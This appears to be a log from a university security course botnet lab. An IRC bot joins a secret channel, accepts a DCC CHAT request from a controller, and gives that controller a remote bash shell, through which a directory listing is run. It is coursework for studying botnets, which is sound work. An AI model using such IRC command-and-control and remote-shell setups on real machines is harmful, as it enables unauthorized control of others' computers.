1299277052277 *** Connected to server.
1299277052279 >>>NICK bot_93f0cee3-111e-459e-8e70-24d7501732f3
1299277052279 >>>USER PircBot 8 * :PircBot 1.5.0 Java IRC Bot - www.jibble.org
1299277052281 :botweb.cse484 NOTICE AUTH :*** Looking up your hostname...
1299277052281 :botweb.cse484 NOTICE AUTH :*** Found your hostname, cached
1299277052281 :botweb.cse484 NOTICE AUTH :*** Checking Ident
1299277052281 :botweb.cse484 NOTICE AUTH :*** No Ident response
1299277052283 :botweb.cse484 001 bot_93f0cee3-111e-459e-8e70-24 :Welcome to the DALnet IRC Network bot_93f0cee3-111e-459e-8e70-24!PircBot@nocatgw.cs.washington.edu
1299277052283 :botweb.cse484 002 bot_93f0cee3-111e-459e-8e70-24 :Your host is botweb.cse484, running version bahamut-1.8(06)
1299277052283 :botweb.cse484 003 bot_93f0cee3-111e-459e-8e70-24 :This server was created Thu Feb 18 2010 at 11:24:47 PST
1299277052283 :botweb.cse484 004 bot_93f0cee3-111e-459e-8e70-24 botweb.cse484 bahamut-1.8(06) aAbcdefFghiIjkKmnoOrRswxXy bceiIjklLmMnoOprRstv
1299277052283 *** Logged onto server.
1299277052284 :botweb.cse484 005 bot_93f0cee3-111e-459e-8e70-24 NETWORK=DALnet SAFELIST MAXBANS=200 MAXCHANNELS=10 CHANNELLEN=32 KICKLEN=307 NICKLEN=30 TOPICLEN=307 MODES=6 CHANTYPES=# CHANLIMIT=#:10 PREFIX=(ov)@+ STATUSMSG=@+ :are available on this server
1299277052284 :botweb.cse484 005 bot_93f0cee3-111e-459e-8e70-24 CASEMAPPING=ascii WATCH=128 SILENCE=10 ELIST=cmntu EXCEPTS INVEX CHANMODES=beI,k,jl,cimMnOprRst MAXLIST=b:200,e:100,I:100 TARGMAX=DCCALLOW:,JOIN:,KICK:4,KILL:20,NOTICE:20,PART:,PRIVMSG:20,WHOIS:,WHOWAS: :are available on this server
1299277052284 :botweb.cse484 251 bot_93f0cee3-111e-459e-8e70-24 :There are 0 users and 5 invisible on 1 servers
1299277052284 :botweb.cse484 252 bot_93f0cee3-111e-459e-8e70-24 1 :IRC Operators online
1299277052284 :botweb.cse484 254 bot_93f0cee3-111e-459e-8e70-24 2 :channels formed
1299277052284 :botweb.cse484 255 bot_93f0cee3-111e-459e-8e70-24 :I have 5 clients and 0 servers
1299277052284 :botweb.cse484 265 bot_93f0cee3-111e-459e-8e70-24 :Current local users: 5 Max: 144
1299277052285 >>>JOIN #hacktastic
1299277052285 >>>MODE #hacktastic +s
1299277052298 :botweb.cse484 266 bot_93f0cee3-111e-459e-8e70-24 :Current global users: 5 Max: 144
1299277052299 :botweb.cse484 NOTICE bot_93f0cee3-111e-459e-8e70-24 :*** Notice -- motd was last changed at 8/2/2010 10:47
1299277052299 :botweb.cse484 375 bot_93f0cee3-111e-459e-8e70-24 :- botweb.cse484 Message of the Day - 
1299277052299 :botweb.cse484 372 bot_93f0cee3-111e-459e-8e70-24 :-8/2/2010 10:47
1299277052299 :botweb.cse484 372 bot_93f0cee3-111e-459e-8e70-24 :- Welcome to the CSE484 irc server
1299277052299 :botweb.cse484 376 bot_93f0cee3-111e-459e-8e70-24 :End of /MOTD command.
1299277052299 :bot_93f0cee3-111e-459e-8e70-24 MODE bot_93f0cee3-111e-459e-8e70-24 :+iwF
1299277052342 :bot_93f0cee3-111e-459e-8e70-24!PircBot@nocatgw.cs.washington.edu JOIN :#hacktastic
Current op:null
1299277052343 :botweb.cse484 353 bot_93f0cee3-111e-459e-8e70-24 = #hacktastic :@bot_93f0cee3-111e-459e-8e70-24 
1299277052343 :botweb.cse484 366 bot_93f0cee3-111e-459e-8e70-24 #hacktastic :End of /NAMES list.
1299277052347 :bot_93f0cee3-111e-459e-8e70-24!PircBot@nocatgw.cs.washington.edu MODE #hacktastic +s 
1299277055101 :RandR!PircBot@nocatgw.cs.washington.edu JOIN :#hacktastic
Current op:null
1299277062576 :RandR!PircBot@nocatgw.cs.washington.edu PRIVMSG bot_93f0cee3-111e-459e-8e70-24 :DCC CHAT chat 167774091 59800
Done feeding error output from the bash shell to the master bot
bash response: /Users/royman/Code/cse484/Botnet $: 
command: ls -al
bash response: total 280
bash response: drwxr-xr-x  23 royman  staff    782 Mar  4 14:17 .
bash response: drwxr-xr-x  16 royman  staff    544 Feb 28 16:15 ..
bash response: -rw-r--r--@  1 royman  staff   6148 Mar  4 13:33 .DS_Store
bash response: -rw-r--r--   1 royman  staff    344 Feb 28 16:16 .classpath
bash response: drwxr-xr-x  15 royman  staff    510 Mar  4 13:34 .git
bash response: -rw-r--r--   1 royman  staff     12 Mar  3 14:14 .gitignore
bash response: -rw-r--r--   1 royman  staff    365 Feb 28 16:15 .project
bash response: drwxr-xr-x   3 royman  staff    102 Feb 28 16:15 .settings
bash response: -rw-r--r--   1 royman  staff    490 Mar  3 23:01 Makefile
bash response: -rw-r--r--   1 royman  staff    490 Mar  3 20:17 Makefile~
bash response: -rw-r--r--@  1 royman  staff    480 Mar  1 09:47 bad.sh
bash response: drwxr-xr-x  12 royman  staff    408 Mar  4 13:58 bin
bash response: -rw-r--r--   1 royman  staff    666 Mar  1 09:37 bn.sh
bash response: drwxr-xr-x   3 royman  staff    102 Mar  4 14:17 bot_output
bash response: -rw-------   1 royman  staff   3824 Mar  1 12:30 cgethttp.c
bash response: -rw-------@  1 royman  staff   3824 Mar  1 09:41 cgethttp.c~
bash response: -rw-r--r--   1 royman  staff   2102 Mar  1 12:29 cgethttp.h
bash response: -rw-------   1 royman  staff   3795 Mar  1 10:36 cgethttp_old.c
bash response: -rw-r--r--@  1 royman  staff    574 Feb 28 16:20 githelp.txt
bash response: -rwxr-xr-x   1 royman  staff    333 Mar  3 23:00 makebots.sh
bash response: -rwxr-xr-x   1 royman  staff    333 Mar  3 20:17 makebots.sh~
bash response: -rw-r--r--   1 royman  staff  76700 Feb 28 16:09 pircbot.jar
bash response: drwxr-xr-x   9 royman  staff    306 Mar  4 13:34 src
bash response: /Users/royman/Code/cse484/Botnet $: 
Done feeding output from the bash shell to the master bot
Closed the bash shell
1299277083430 :RandR!PircBot@nocatgw.cs.washington.edu QUIT :Client closed connection
